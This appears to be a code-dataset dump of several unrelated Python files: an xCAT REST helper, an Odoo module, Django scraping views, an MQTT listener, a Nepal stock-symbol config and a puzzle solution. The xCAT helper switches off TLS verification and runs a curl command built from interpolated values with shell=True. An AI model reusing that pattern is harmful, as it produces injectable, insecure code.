IBM(c) 2018 EPL license http://www.eclipse.org/legal/epl-v10.html\n###############################################################################\n# -*- coding: utf-8 -*-\n#\n\nfrom gevent.subprocess import Popen, PIPE\nimport requests\nimport urllib3\nurllib3.disable_warnings()\n\nimport exceptions as xcat_exception\n\nclass RestSession(object):\n\n def __init__(self):\n self.session = requests.Session()\n self.cookies = None\n\n def request(self, method, url, headers, data=None, timeout=30):\n\n try:\n response = self.session.request(method, url,\n data=data,\n headers=headers,\n verify=False,\n timeout=timeout)\n except requests.exceptions.ConnectionError:\n raise xcat_exception.SelfServerException('Error: Failed to connect to server.')\n\n except requests.exceptions.Timeout:\n raise xcat_exception.SelfServerException('Error: Timeout to connect to server')\n\n if not self.cookies:\n self.cookies = requests.utils.dict_from_cookiejar(self.session.cookies)\n\n return response\n\n def request_upload(self, method, url, headers, files, using_curl=True):\n if using_curl:\n return self._upload_by_curl(method, url, headers, files)\n\n def _upload_by_curl(self, method, url, headers, files):\n\n header_str = ' '.join([ \"%s: %s\" % (k, v) for k,v in headers.items() ])\n request_cmd = 'curl -k -b sid=%s -H \"%s\" -X %s -T %s %s -s' % \\\n (self.cookies['sid'], header_str, method, files, url)\n\n sub = Popen(request_cmd, stdout=PIPE, shell=True)\n response, err = sub.communicate()\n\n if not response:\n error = 'Error: Did not receive response from server after ' \\\n 'running command \\'%s\\'' % request_cmd\n raise SelfServerException(error)\n\n return response\n","repo_name":"chenglch/xcat-core","sub_path":"xCAT-openbmc-py/lib/python/agent/common/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"73734428052","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import ValidationError\n\n\nclass MailActivity(models.Model):\n _inherit = 'mail.activity'\n\n progress_id = fields.Many2one(\n 'mail.activity.progress', 'Progress',\n index=True, ondelete='restrict')\n\n @api.onchange('activity_type_id')\n def _onchange_activity_type_id(self):\n res = super(MailActivity, self)._onchange_activity_type_id()\n if self.activity_type_id not in self.progress_id.activity_type_ids:\n self.progress_id = False\n if not res:\n res = {}\n if 'domain' not in res:\n res['domain'] = {}\n if self.activity_type_id:\n res['domain']['progress_id'] = [\n '|', ('activity_type_ids', 'in', [self.activity_type_id.id]),\n ('activity_type_ids', 'in', [])]\n return res\n res['domain']['progress_id'] = [('activity_type_ids', '=', False)]\n return res\n\n @api.constrains\n def _constrain_progress_activity_type(self):\n for rec in self:\n if rec.progress_id and rec.activity_type_id not in \\\n rec.progress_id.activity_type_ids:\n raise ValidationError(\n _('The progress %s is not allowed for the '\n 'selected activity type %s.') %\n (rec.progess_id.name, rec.activity_type_id.name))\n\n @api.multi\n def action_create_calendar_event(self):\n action = super(MailActivity, self).action_create_calendar_event()\n if action.get('context'):\n action['context'].update({\n 'default_progress_id': self.progress_id.id,\n })\n return action\n","repo_name":"ForgeFlow/ao-odoo","sub_path":"mail_activity_progress/models/mail_activity.py","file_name":"mail_activity.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"34848924789","text":"from django.http.response import Http404\nfrom django.shortcuts import render\nfrom train_delay.models import TrainInfo\nfrom train_delay.database_util import check_last_update\nfrom bs4 import BeautifulSoup\nimport requests\n\n# Create your views here.\ndef index(request):\n train_info = TrainInfo.objects.all()\n context = {\n 'information': train_info,\n }\n\n if request.LANGUAGE_CODE == 'ja':\n context['operator_list'] = sorted(list(set([info.operator_ja for info in train_info])))\n elif request.LANGUAGE_CODE == 'en':\n context['operator_list'] = sorted(list(set([info.operator_en for info in train_info])))\n \n return render(request, 'train_delay/index.html', context)\n\n\ndef detail(request, operator_en, railway_en):\n this_railway = TrainInfo.objects.get(operator_en=operator_en, railway_en=railway_en)\n search_keyword = this_railway.railway_ja\n\n while True:\n response = requests.get(f\"https://news.yahoo.co.jp/search?p={search_keyword}&ei=utf-8\")\n soup = BeautifulSoup(response.text, features=\"html.parser\")\n\n titles = [tag.getText() for tag in soup.find_all(name=\"div\", class_=\"newsFeed_item_title\")[:3]]\n\n if len(titles) == 0:\n if \"線\" in search_keyword:\n search_keyword = search_keyword.split(\"線\")[0] + \"線\"\n elif \"ライン\" in search_keyword:\n search_keyword = search_keyword.split(\"ライン\")[0] + \"ライン\"\n continue\n\n links = [tag.get(\"href\") for tag in soup.find_all(name=\"a\", class_=\"newsFeed_item_link\")[:3]] \n all_texts = soup.find_all(\"div\", class_=\"newsFeed_item_text\")[:3]\n texts = [div.select(\".newsFeed_item_text > div:nth-of-type(2)\")[0].get_text() for div in all_texts]\n subtitles = [tag.getText() for tag in soup.find_all(name=\"div\", class_=\"newsFeed_item_sourceWrap\")[:3]]\n break\n\n context = {\n 'information': this_railway,\n 'news_list': [{'title': title, 'link': link, 'text': text, 'subtitle': subtitle} for title, link, text, subtitle in zip(titles, links, texts, subtitles)]\n }\n\n if request.LANGUAGE_CODE == 'ja':\n context['operator_list'] = sorted(list(set([info.operator_ja for info in TrainInfo.objects.all()])))\n elif request.LANGUAGE_CODE == 'en':\n context['operator_list'] = sorted(list(set([info.operator_en for info in TrainInfo.objects.all()])))\n \n return render(request, 'train_delay/detail.html', context)","repo_name":"chanon-lim/team14-g6-train-delay","sub_path":"train_delay/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"24925697711","text":"import paho.mqtt.client as mqtt\nimport database.service as db\nimport time\nimport json\nfrom datetime import datetime\n\nIP = \"164.4.1.1\"\n\ndef on_message(client, userdata, message):\n print(\"Reception\")\n if message.topic == \"fire\":\n jsonmsg = json.loads(str(message.payload.decode(\"utf-8\")))\n db.createFire(jsonmsg[\"date\"], jsonmsg[\"position\"][0], jsonmsg[\"position\"][1], jsonmsg[\"intensity\"])\n elif message.topic == \"sensor\":\n jsonmsg = json.loads(str(message.payload.decode(\"utf-8\")))\n db.createSensors(datetime.now(), jsonmsg[\"id\"], jsonmsg[\"intensity\"])\n\n# Informations de connexion à votre broker MQTT : \n# adresse IP\nbroker = IP\n# on se connecte au broker et on publie le message sur le topic\nclient = mqtt.Client(\"S1\")\nclient.on_message=on_message #attach function to callback\nclient.connect(broker, 1884)\nclient.loop_start()\n\n\ndef readBroker():\n while True:\n client.subscribe([(\"fire\", 0), (\"sensor\", 0)])\n time.sleep(1)\n\n\n\n","repo_name":"Emile-Bergin/S7-ProjetScientifique","sub_path":"Application_Module/Grafana_python/MQTT/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2069676930","text":"from box import Box\n\nSTART_URL = {\n \"CommercialBankShare\": Box({\n \"file_location\" : {\n \"W\":\"../../../../../data/commercialBank/weekly.json\",\n \"M\": \"../../../../../data/commercialBank/monthly.json\",\n \"Y\": \"../../../../../data/commercialBank/yearly.json\",\n \"Q\": \"../../../../../data/commercialBank/quaterly.json\",\n \"D\": \"../../../../../data/commercialBank/daily.json\"\n },\n \"links\": [ \n {\"name\": \"Agriculture Development Bank Limited\", \"symbol\": \"ADBL\", \"value\": 397},\n {\"name\": \"Bank of Kathmandu Ltd\", \"symbol\": \"BOKL\", \"value\": 138},\n {\"name\": \"Century Commercial Bank Ltd\", \"symbol\": \"CCBL\", \"value\": 605},\n {\"name\": \"Citizen Bank International Limited\", \"symbol\": \"CZBIL\", \"value\": 348},\n {\"name\": \"Civil Bank Ltd\", \"symbol\":\"CBL\", \"value\": 532},\n {\"name\":\"Everest Bank Limited\", \"symbol\": \"EBL\", \"value\": 137},\n {\"name\": \"Global IME Bank Limited\", \"symbol\": \"GBIME\", \"value\": 341},\n {\"name\": \"Himalayan Bank Limited\", \"symbol\": \"HBL\", \"value\": 134}, \n {\"name\": \"Kumari Bank Limited\", \"symbol\": \"KBL\", \"value\": 142},\n {\"name\": \"Laxmi Bank Limited\", \"symbol\": \"LBL\", \"value\": 141},\n {\"name\": \"Machhapuchhre Bank Limited\", \"symbol\": \"MBL\", \"value\": 140},\n {\"name\": \"Mega Bank Nepal Ltd\", \"symbol\": \"MEGA\", \"value\": 562},\n {\"name\": \"Nabil Bank Limited\", \"symbol\": \"NABIL\", \"value\": 131},\n {\"name\": \"Nepal Bangladesh Bank Limited\", \"symbol\": \"NBB\", \"value\": 136},\n {\"name\": \"Nepal Bank Limited\", \"symbol\": \"NBL\", \"value\": 517},\n {\"name\": \"Nepal Credit And Commercial Bank Limited\", \"symbol\": \"NCCB\", \"value\": 144},\n {\"name\": \"Nepal Investment Bank Limited\", \"symbol\": \"NIB\", \"value\": 132},\n {\"name\": \"Nepal SBI Bank Limited\", \"symbol\": \"SBI\", \"value\": 135},\n {\"name\": \"NIC Asia Bank Ltd\", \"symbol\": \"NICA\", \"value\": 139},\n {\"name\": \"NMB Bank Limited\", \"symbol\": \"NMB\", \"value\": 238},\n {\"name\": \"Prabhu Bank Limited\", \"symbol\": \"PRVU\", \"value\": 255},\n {\"name\": \"Prime Commercial Bank Ltd\", \"symbol\": \"PCBL\", \"value\": 357},\n {\"name\": \"Sanima Bank Limited\", \"symbol\": \"SANIMA\", \"value\":171},\n {\"name\": \"Siddhartha Bank Limited\", \"symbol\": \"SBL\", \"value\": 145}, \n {\"name\": \"Standard Chartered Bank Limited\", \"symbol\": \"SCB\", \"value\":133},\n {\"name\": \"Sunrise Bank Limited\", \"symbol\": \"SRBL\", \"value\": 359}\n ]}),\n \"DevelopmentBank\": Box({\n \"file_location\":{\n \"W\":\"../../../../../data/developmentBank/weekly.json\",\n \"M\": \"../../../../../data/developmentBank/monthly.json\",\n \"Y\": \"../../../../../data/developmentBank/yearly.json\",\n \"Q\": \"../../../../../data/developmentBank/quaterly.json\",\n \"D\": \"../../../../../data/developmentBank/daily.json\"\n },\n \"links\": [\n {\"name\": \"Corporate Development Bank Limited\", \"symbol\": \"CORBL\", \"value\": 450},\n {\"name\": \"Deva Bikas Bank Limited\", \"symbol\": \"DBBL\", \"value\": 311},\n {\"name\": \"Excel Development Bank Ltd\", \"symbol\": \"EDBL\", \"value\": 274},\n {\"name\": \"Gandaki Bikas Bank Limited\", \"symbol\": \"GDBL\", \"value\": 420},\n {\"name\": \"Garima Bikas Bank Limited\", \"symbol\": \"GBBL\", \"value\": 417},\n {\"name\": \"Green Development Bank Ltd\", \"symbol\": \"GRDBL\", \"value\": 2744},\n {\"name\": \"Jyoti Bikas Bank Limited\", \"symbol\": \"JBBL\", \"value\": 418},\n {\"name\": \"Kamana Sewa Bikas Bank Limited\", \"symbol\": \"KSBBL\", \"value\": 459}, \n {\"name\": \"Kanchan Development Bank Limited\", \"symbol\": \"KADBL\", \"value\": 505},\n {\"name\": \"Karnali Development Bank Limited\", \"symbol\": \"KRBL\", \"value\": 428},\n {\"name\": \"Lumbini Bikas Bank Ltd\", \"symbol\": \"LBBL\", \"value\": 358},\n {\"name\": \"Mahalaxmi Bikas Bank Ltd\", \"symbol\": \"MLBL\", \"value\": 401},\n {\"name\": \"Miteri Development Bank Limited\", \"symbol\": \"MDB\", \"value\": 371},\n {\"name\": \"Muktinath Bikas Bank Ltd\", \"symbol\": \"MNBBL\", \"value\": 474},\n {\"name\": \"Narayani Development Bank Limited\", \"symbol\": \"NABBC\", \"value\": 172},\n {\"name\": \"Nepal Community Development Bank Ltd\", \"symbol\": \"NCDB\", \"value\": 598},\n {\"name\": \"Sahara Bikas Bank Ltd\", \"symbol\": \"SHBL\", \"value\": 625},\n {\"name\": \"Sahayogi Bikas Bank Limited\", \"symbol\": \"SBBLJ\", \"value\": 174},\n {\"name\": \"Saptakoshi Development Bank Ltd\", \"symbol\": \"SAPDBL\",\"value\": 2860},\n {\"name\": \"Shangrila Development Bank Ltd\", \"symbol\": \"SADBL\",\"value\": 472},\n {\"name\": \"Shine Resunga Development Bank Ltd\", \"symbol\": \"SHINE\", \"value\": 473},\n {\"name\": \"Sindhu Bikash Bank Ltd\", \"symbol\": \"SINDU\", \"value\": 561},\n {\"name\": \"Tinau Mission Development Bank Limited\", \"symbol\": \"TMDBL\", \"value\": 2855}\n ]}),\n \"FinancialBankShare\": Box({\n \"file_location\" : {\n \"W\":\"../../../../../data/financialCompanies/weekly.json\",\n \"M\": \"../../../../../data/financialCompanies/monthly.json\",\n \"Y\": \"../../../../../data/financialCompanies/yearly.json\",\n \"Q\": \"../../../../../data/financialCompanies/quaterly.json\",\n \"D\": \"../../../../../data/financialCompanies/daily.json\"\n },\n \"links\": [ \n {\"name\": \"Best Finance Company Ltd\", \"symbol\": \"BFC\", \"value\": 227},\n {\"name\": \"Capital Merchant Bank & Finance Co. Ltd\", \"symbol\": \"CMB\", \"value\": 259},\n {\"name\": \"Central Finance Co. Ltd\", \"symbol\": \"CFCL\", \"value\": 245},\n {\"name\": \"City Express Finance Co. Limited\", \"symbol\": \"CEFL\", \"value\": 296},\n {\"name\": \"Crystal Finance Ltd\", \"symbol\": \"CFL\", \"value\": 361},\n {\"name\": \"Goodwill Finance Co. Ltd\", \"symbol\": \"GFCL\", \"value\": 232},\n {\"name\": \"Guheshowori Merchant Bank & Finance Co. Ltd\", \"symbol\": \"GMFIL\",\"value\": 263},\n {\"name\": \"Gurkhas Finance Ltd\", \"symbol\": \"GUFL\", \"value\": 204},\n {\"name\": \"ICFC Finance Limited\", \"symbol\": \"ICFC\", \"value\": 273},\n {\"name\": \"Janaki Finance Ltd\", \"symbol\": \"JFL\", \"value\": 250},\n {\"name\": \"Lalitpur Finance Ltd.\", \"symbol\": \"LFC\", \"value\": 231},\n {\"name\": \"Manjushree Finance Ltd\", \"symbol\": \"MFIL\", \"value\": 516},\n {\"name\": \"Multipurpose Finance Company Limited\", \"symbol\": \"MPFL\", \"value\": 471},\n {\"name\": \"Nepal Finance Ltd.\", \"symbol\": \"NFS\", \"value\": 194},\n {\"name\": \"Nepal Share Markets Ltd.\", \"symbol\": \"NSM\", \"value\": 200},\n {\"name\": \"Pokhara Finance Ltd\", \"symbol\": \"PFL\", \"value\": 236},\n {\"name\": \"ProgressiveFinance Limited\", \"symbol\": \"PROFL\", \"value\": 338},\n {\"name\": \"Reliance Finance Ltd.\", \"symbol\": \"RLFL\", \"value\": 587},\n {\"name\": \"Samriddhi Finance Company Limited\", \"symbol\": \"SFCL\", \"value\":256},\n {\"name\": \"Shree Investment Finance Co. Ltd.\", \"symbol\": \"SIFC\", \"value\": 244},\n {\"name\": \"Shrijana Finance (Bittaya Sanstha)\", \"symbol\": \"SFFIL\", \"value\": 261},\n {\"name\": \"Synergy Finance Ltd.\", \"symbol\": \"SYFL\", \"value\": 249},\n {\"name\": \"United Finance Ltd.\", \"symbol\": \"UFL\", \"value\": 242}\n ]}),\n \"MicroFinance\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/microfinance/weekly.json\",\n \"M\": \"../../../../../data/microfinance/monthly.json\",\n \"Y\": \"../../../../../data/microfinance/yearly.json\",\n \"Q\": \"../../../../../data/microfinance/quaterly.json\",\n \"D\": \"../../../../../data/microfinance/daily.json\"\n },\n \"links\": [\n {\"name\": \"Adhikhola Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"AKBSL\", \"value\": 2845},\n {\"name\": \"Arambha Microfinance Bittiya Sanstha Ltd\", \"symbol\": \"AMFI\", \"value\": 2777},\n {\"name\": \"Asha Laghubitta Bittiya Sanstha Ltd\", \"symbol\": \"ALBSL\", \"value\": 2807},\n {\"name\": \"Chhimek Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"CBBL\", \"value\": 164},\n {\"name\": \"Deprosc Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"DDBL\", \"value\": 166},\n {\"name\": \"First Micro Finance Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"FMDBL\", \"value\": 490},\n {\"name\": \"Kalika Laghubitta Bittiya Sanstha Limited\", \"symbol\":\"KMCDB\", \"value\":593},\n {\"name\": \"Nerude Laghubita Bikas Bank Limited\", \"symbol\": \"NLBBL\", \"value\": 396},\n {\"name\": \"Nirdhan Utthan Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"NUBL\", \"value\": 163},\n {\"name\": \"RMDC Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"RMDC\", \"value\": 575},\n {\"name\": \"Sana Kisan Bikas Laghubitta Bittiya sanstha Limited\", \"symbol\": \"SKBBL\", \"value\": 574},\n {\"name\": \"Swarojgar Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"SLBBL\", \"value\": 545},\n {\"name\": \"Summit Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"SMFDB\", \"value\": 502},\n {\"name\": \"Swabalamban Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SWBBL\", \"value\":268},\n {\"name\": \"Mithila Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"MLBBL\", \"value\":601},\n {\"name\": \"Laxmi Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"LLBS\", \"value\": 618},\n {\"name\": \"Mirmire Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"MMFDB\", \"value\": 682},\n {\"name\": \"Janautthan Samudayic Laghubitta Bikas Bank Ltd.\", \"symbol\": \"JSLBB\", \"value\": 695},\n {\"name\": \"Womi Microfinance Bittiya Sanstha Ltd.\", \"symbol\": \"WOMI\", \"value\": 706},\n {\"name\": \"Vijaya laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"VLBS\", \"value\": 687 },\n {\"name\": \"RSDC Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"RSDC\", \"value\": 2748},\n {\"name\": \"NMB Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"NMBMF\", \"value\": 704},\n {\"name\": \"Meromicrofinance Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"MERO\", \"value\": 1741},\n {\"name\": \"National Microfinance Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"NMFBS\", \"value\": 2746},\n {\"name\": \"Suryodaya Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"SLBS\", \"value\": 2750},\n {\"name\": \"Ganapati Microfinance Bittiya Sanstha Ltd\", \"symbol\": \"GMFBS\", \"value\": 2815},\n {\"name\": \"Civil Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"CLBSL\", \"value\": 693},\n {\"name\": \"Infinity Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"ILBS\", \"value\": 2832},\n {\"name\": \"Forward Microfinance Laghubitta Bittiya Sanstha Ltd\", \"symbol\": \"FOWAD\", \"value\": 2758},\n {\"name\": \"Samata Gharelu Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SMATA\", \"value\": 2761},\n {\"name\": \"Mahuli Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"MSLB\", \"value\": 2768},\n {\"name\": \"Global IME Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"GILB\", \"value\": 705},\n {\"name\": \"Support Microfinance Bittiya Sanstha Ltd.\", \"symbol\": \"SMB\", \"value\": 2771},\n {\"name\": \"Grameen Bikas Laghubitta Bittiya Sanstha Ltd.\", \"symbol\": \"GBLBS\", \"value\": 583},\n {\"name\": \"Mahila Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"MLBSL\", \"value\": 2925},\n {\"name\": \"Gurans Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"GLBSL\", \"value\": 2826},\n {\"name\": \"NIC Asia Laghubitta Biitiya Sanstha Limited\", \"symbol\": \"NICLBSL\", \"value\": 2887},\n {\"name\": \"Samudayik Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SLBSL\", \"value\": 2804},\n {\"name\": \"Sadhana Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SDLBSL\", \"value\": 2896},\n {\"name\": \"Swabhimaan Laghubitta Bittiya Sanstha Ltd\", \"symbol\": \"SMFBS\", \"value\": 2829},\n {\"name\": \"SABAIKO LAGHUBITTA BITTIYA SANSTHA LIMITED\", \"symbol\": \"SABSL\", \"value\": 2843},\n {\"name\": \"Aarambha Chautari Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"ACLBSL\", \"value\": 2790},\n {\"name\": \"Unnati Sahakarya Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"USLB\", \"value\": 2774},\n {\"name\": \"Sarathi Nepal Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SNLB\", \"value\": 592},\n {\"name\": \"Kisan Lagubitta Bittiya Sanstha Limited\", \"symbol\": \"KLBSL\", \"value\": 694},\n {\"name\": \"Meromicrofinance Laghubitta Bittiya Sanstha Limited Promoter Share\", \"symbol\": \"MEROPO\", \"value\": 1742}\n ]\n }),\n \"Hotel\": Box({\n \"file_location\":{\n \"W\":\"../../../../../data/hotel/weekly.json\",\n \"M\": \"../../../../../data/hotel/monthly.json\",\n \"Y\": \"../../../../../data/hotel/yearly.json\",\n \"Q\": \"../../../../../data/hotel/quaterly.json\",\n \"D\": \"../../../../../data/hotel/daily.json\"\n },\n \"links\": [\n {\"name\": \"Oriental Hotels Limited\", \"symbol\": \"OHL\", \"value\": 149},\n {\"name\": \"Soaltee Hotel Limited\", \"symbol\": \"SHL\", \"value\": 147},\n {\"name\": \"Taragaon Regency Hotel Limited\", \"symbol\": \"TRH\", \"value\": 148},\n {\"name\": \"Chandragiri Hills Limited\", \"symbol\": \"CGH\", \"value\": 2917}\n ]\n }),\n \"HydroPower\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/hydropower/weekly.json\",\n \"M\": \"../../../../../data/hydropower/monthly.json\",\n \"Y\": \"../../../../../data/hydropower/yearly.json\",\n \"Q\": \"../../../../../data/hydropower/quaterly.json\",\n \"D\": \"../../../../../data/hydropower/daily.json\"\n },\n \"links\": [\n {\"name\": \"Arun Valley Hydropower Development Co. Ltd.\", \"symbol\": \"AHPC\", \"value\": 360 },\n {\"name\": \"Butwal Power Company Limited\", \"symbol\": \"BPCL\", \"value\": 153},\n {\"name\": \"Chilime Hydropower Company Limited\", \"symbol\": \"CHCL\", \"value\": 154},\n {\"name\": \"National Hydro Power Company Limited\", \"symbol\": \"NHPC\", \"value\": 152},\n {\"name\": \"Sanima Mai Hydropower Ltd.\", \"symbol\": \"SHPC\", \"value\": 591},\n {\"name\": \"Ridi Hydropower Development Company Ltd.\", \"symbol\": \"RHPC\", \"value\": 610},\n {\"name\": \"Himalaya Urja Bikas Company Limited\", \"symbol\": \"HURJA\", \"value\": 2824},\n {\"name\": \"Arun Kabeli Power Ltd.\", \"symbol\": \"AKPL\", \"value\": 2757 },\n {\"name\": \"Barun Hydropower Co. Ltd.\", \"symbol\": \"BARUN\", \"value\": 686},\n {\"name\": \"Api Power Company Ltd.\", \"symbol\": \"API\", \"value\": 697},\n {\"name\": \"Ngadi Group Power Ltd.\", \"symbol\": \"NGPL\", \"value\": 2743},\n {\"name\": \"SANJEN JALAVIDHYUT COMPANY LIMITED\", \"symbol\": \"SJCL\", \"value\": 2842},\n {\"name\": \"RASUWAGADHI HYDROPOWER COMPANY LIMITED\", \"symbol\": \"RHPL\", \"value\": 2841},\n {\"name\": \"United Modi Hydropower Ltd.\", \"symbol\": \"UMHL\", \"value\": 2760},\n {\"name\": \"Dibyashwori Hydropower Ltd.\", \"symbol\": \"DHPL\", \"value\": 2754}\n ]\n }),\n \"LifeInsurance\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/lifeinsurance/weekly.json\",\n \"M\": \"../../../../../data/lifeinsurance/monthly.json\",\n \"Y\": \"../../../../../data/lifeinsurance/yearly.json\",\n \"Q\": \"../../../../../data/lifeinsurance/quaterly.json\",\n \"D\": \"../../../../../data/lifeinsurance/daily.json\"\n },\n \"links\": [\n {\"name\": \"Asian Life Insurance Co. Limited\", \"symbol\": \"ALICL\", \"value\": 385},\n {\"name\": \"Gurans Life Insurance Company Ltd.\", \"symbol\": \"GLICL\", \"value\": 447},\n {\"name\": \"Life Insurance Co. Nepal\", \"symbol\": \"LICN\", \"value\": 188},\n {\"name\": \"Nepal Life Insurance Co. Ltd.\", \"symbol\": \"NLIC\", \"value\": 187},\n {\"name\": \"National Life Insurance Co. Ltd.\", \"symbol\": \"NLICL\", \"value\": 178},\n {\"name\": \"Prime Life Insurance Company Limited\", \"symbol\": \"PLIC\", \"value\": 393},\n {\"name\": \"Surya Life Insurance Company Limited\", \"symbol\": \"SLICL\", \"value\": 403},\n {\"name\": \"Jyoti Life Insurance Company Limited\", \"symbol\": \"JLI\", \"value\": 2929},\n {\"name\": \"Reliance Life Insurance Company Limited\", \"symbol\": \"RLI\", \"value\": 2900},\n {\"name\": \"Prabhu Life Insurance Limited\", \"symbol\": \"PLI\", \"value\": 2915},\n ]\n }),\n \"NonLifeInsurance\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/nonlifeinstitution/weekly.json\",\n \"M\": \"../../../../../data/nonlifeinstitution/monthly.json\",\n \"Y\": \"../../../../../data/nonlifeinstitution/yearly.json\",\n \"Q\": \"../../../../../data/nonlifeinstitution/quaterly.json\",\n \"D\": \"../../../../../data/nonlifeinstitution/daily.json\"\n },\n \"links\": [\n {\"name\": \"Everest Insurance Co. Ltd.\", \"symbol\": \"EIC\", \"value\": 181},\n {\"name\": \"Himalayan General Insurance Co. Ltd\", \"symbol\": \"HGI\", \"value\": 179},\n {\"name\": \"Lumbini General Insurance Co. Ltd.\", \"symbol\": \"LGIL\", \"value\": 190},\n {\"name\": \"Nepal Insurance Co. Ltd.\", \"symbol\": \"NICL\", \"value\": 176},\n {\"name\": \"Neco Insurance Co. Ltd.\", \"symbol\": \"NIL\", \"value\": 183},\n {\"name\": \"NLG Insurance Company Ltd.\", \"symbol\": \"NLG\", \"value\": 559},\n {\"name\": \"Premier Insurance Co. Ltd.\", \"symbol\": \"PIC\", \"value\": 182 },\n {\"name\": \"Prudential Insurance Co. Ltd.\", \"symbol\": \"PICL\", \"value\": 189},\n {\"name\": \"Sagarmatha Insurance Co. Ltd.\", \"symbol\": \"SIC\", \"value\":185 },\n {\"name\": \"Shikhar Insurance Co. Ltd.\", \"symbol\": \"SICL\", \"value\": 192},\n {\"name\": \"Siddhartha Insurance Ltd.\", \"symbol\": \"SIL\", \"value\": 280},\n {\"name\": \"United Insurance Co. (Nepal) Ltd.\", \"symbol\": \"UIC\", \"value\": 180 },\n {\"name\": \"Prabhu Insurance Ltd.\", \"symbol\": \"PRIN\", \"value\": 184},\n {\"name\": \"Rastriya Beema Company Limited\", \"symbol\": \"RBCL\", \"value\": 177},\n {\"name\": \"IME General Insurance Ltd.\", \"symbol\": \"IGI\", \"value\": 186},\n {\"name\": \"AJOD Insurance Limited\", \"symbol\": \"AIL\", \"value\":2893 },\n {\"name\": \"Sanima General Insurance Company Limited\", \"symbol\": \"SGI\", \"value\":2908 },\n {\"name\": \"General Insurance Company Limited\", \"symbol\": \"GIC\", \"value\": 2905}\n ]\n }),\n \"Trading\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/trading/weekly.json\",\n \"M\": \"../../../../../data/trading/monthly.json\",\n \"Y\": \"../../../../../data/trading/yearly.json\",\n \"Q\": \"../../../../../data/trading/quaterly.json\",\n \"D\": \"../../../../../data/trading/daily.json\"\n },\n \"links\": [\n {\"name\": \"Bishal Bazar Company Limited\", \"symbol\": \"BBC\", \"value\": 156},\n {\"name\": \"Salt Trading Corporation\", \"symbol\": \"STC\", \"value\": 155}\n ]\n }),\n \"Manufacturing\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/manufacturing/weekly.json\",\n \"M\": \"../../../../../data/manufacturing/monthly.json\",\n \"Y\": \"../../../../../data/manufacturing/yearly.json\",\n \"Q\": \"../../../../../data/manufacturing/quaterly.json\",\n \"D\": \"../../../../../data/manufacturing/daily.json\"\n },\n \"links\": [\n {\"name\": \"Bottlers Nepal (Balaju) Limited\", \"symbol\": \"BNL\", \"value\": 195},\n {\"name\": \"Bottlers Nepal (Terai) Limited\", \"symbol\": \"BNT\", \"value\": 213},\n {\"name\": \"Himalayan Distillery Limited\", \"symbol\": \"HDL\", \"value\": 235},\n {\"name\": \"Nepal Lube Oil Limited\", \"symbol\": \"NLO\", \"value\": 198 },\n {\"name\": \"Shree Raghupati Jute Mills Limited\", \"symbol\": \"RJM\", \"value\": 203},\n {\"name\": \"Unilever Nepal Limited\", \"symbol\": \"UNL\", \"value\": 219},\n {\"name\": \"SHIVAM CEMENTS LTD\", \"symbol\": \"SHIVM\", \"value\": 2809},\n ]\n })\n\n}\n\n","repo_name":"SERPANT/nepse_share_analysis","sub_path":"scraper-daemon/src/Share_scrapy/Share_scrapy/constants/website_link.py","file_name":"website_link.py","file_ext":"py","file_size_in_byte":19905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13182984224","text":"from collections import Counter\n\nwith open(\"08-input.txt\") as file:\n lines = file.readlines()\n lines = [x.split(\"|\")[1].strip() for x in lines]\n counters = Counter({x: 0 for x in range(8)})\n for line in lines:\n for x in line.split():\n a = len(x)\n counters[len(x)] +=1\n\n print(counters)\n print(counters[2]+ counters[3] + counters[4] + counters[7])\n ","repo_name":"Rankarusu/AdventOfCode","sub_path":"08-A.py","file_name":"08-A.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19826345477","text":"from nation.models import Nation, Econdata, Military, Market, Marketofferlog\nfrom nation.variables import min_land\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Q, F, 